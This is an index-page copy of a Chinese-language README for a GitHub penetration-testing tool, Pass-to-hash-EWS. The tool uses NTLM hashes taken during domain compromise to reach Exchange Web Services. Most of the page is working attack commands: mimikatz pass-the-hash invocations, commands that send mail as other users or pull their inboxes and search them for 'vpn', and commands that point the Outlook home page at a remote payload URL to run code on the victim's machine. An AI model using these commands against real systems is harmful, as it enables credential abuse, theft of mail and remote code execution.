Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/pentest-tools-public/Pass-to-hash-EWS


https://github.com/pentest-tools-public/Pass-to-hash-EWS

Last synced: 22 days ago
JSON representation

Awesome Lists containing this project

README

        

# 使用说明

## 前人工具局限

### 1. ntlmRelayToEWS.py 该工具主要应用于 ntlmv1 ntlmv2 hash的中继劫持验证ews接口,ntlmv1 ntlmv2 中继都只能在认证过程中劫持,无法反复利用。
ntlmv1 ntlmv2 hash获取需配合unc路径触发

```
ntlmRelayToEWS.py -t https://mail.xxx.net/EWS/exchange.asmx -r setHomePage -f inbox -u http://test.org/cacheimg/xxxxxxxxxxxxxxxxx.html
```

### 2. ruler 该工具go语言编写 1.ews接口爆破账号密码 2. outlook规则创建执行命令 3.outlook home url创建命令执行
代码中使用exchange自动发现协议,利用autodiscover/autodiscover.xml来查找相关接口,有些公司exchange邮件服务器并未启用autodiscover

## 编写目的:

不考虑relay中继的情况下 ,解决在域渗透过程中,ntds.dit抓出来的ntlm hash解不出来明文, 无法登陆exchange owa查看邮件。

利用指定exchange的ews接口 用mimikatz pth后,可直接操作收发邮件,以及通过修改设置outlook-home-Url 在outlook客户端所属win客户端执行命令

使用说明:

tips:可以使用mimikatz 进行ntlm pth 然后即可使用其他用户凭据进行发送邮件

```
mimikatz.exe privilege::debug "sekurlsa::pth /user:xxxxxxx-hr /domain:corp.xxx.net /ntlm:e00cae2eee1977cec78e888888888888 /run:cmd" exit
mimikatz.exe privilege::debug "sekurlsa::pth /user:xxxxxxxxxxxx-it /domain:corp.xxx.net /ntlm:72abd45c3af888888963e86d9c888888 /run:cmd" exit
```

### 1.Sendmail

使用默认凭证发送邮件, html.txt 为自定义的正文内容 支持html格式

```
pth_to_ews.exe https://sb/ews/exchange.asmx -Sendmail -T "sbsbsbsb" -TM [email protected] -B HTML.txt
```
使用账号密码发送邮件

```
pth_to_ews.exe https://sb/ews/exchange.asmx -U [email protected] -P ddddd!@#$ -Sendmail -T "你好" -TM [email protected] -B HTML.txt
```

### 2. Get Inbox|SentItems Mail:

使用默认凭证收取 收件箱邮件

```
pth_to_ews.exe https://sb/ews/exchange.asmx -MType Inbox //保存在目录下的inbox文件夹中为eml格式
```

使用默认凭证收取SentItems邮件

```
pth_to_ews.exe https://sb/ews/exchange.asmx -MType SentItems
```

使用默认凭证收取邮件 检索关键字vpn

```
pth_to_ews.exe https://mail.xxx.net/ews/exchange.asmx -MType SentItems -Filterstring "vpn"
```

使用账号密码收取邮件

```
pth_to_ews.exe https://sb/ews/exchange.asmx -U [email protected] -P xxxx!@#$ -MType Inbox
```

使用账号密码收取邮件 检索关键字vpn

```
pth_to_ews.exe https://sb/ews/exchange.asmx -U [email protected] -P ssss!@#$ -MType Inbox -Filterstring vpn
```

### 3. Set Outlook HomePage Inbox Url 攻击利用 _已测试exchenge2010 outlook2010/2013

使用默认凭证验证ews接口设置outlook 客户端主页,url为远程pyloadurl,html里面写payload。

homepage的文章 https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

```
pth_to_ews.exe https://mailxxxo.net/ews/exchange.asmx -Purl http://www.test.org/cacheimg/ceshi.html -Type Set
```

Reset参数为删除设置outlook 客户端主页

```
pth_to_ews.exe https://maxxx.net/ews/exchange.asmx -Purl http://www.test.org/cacheimg/ceshi.html -Type Set
```

使用账号密码设置outlook 客户端主页url,url为远程pyloadurl,html里面写payload

```
pth_to_ews.exe https://mail.xxx..net/ews/exchange.asmx -U [email protected] -P xxxx!@#$% -Purl http://www.test.org/cacheimg/ceshi.htmll -Type Set
```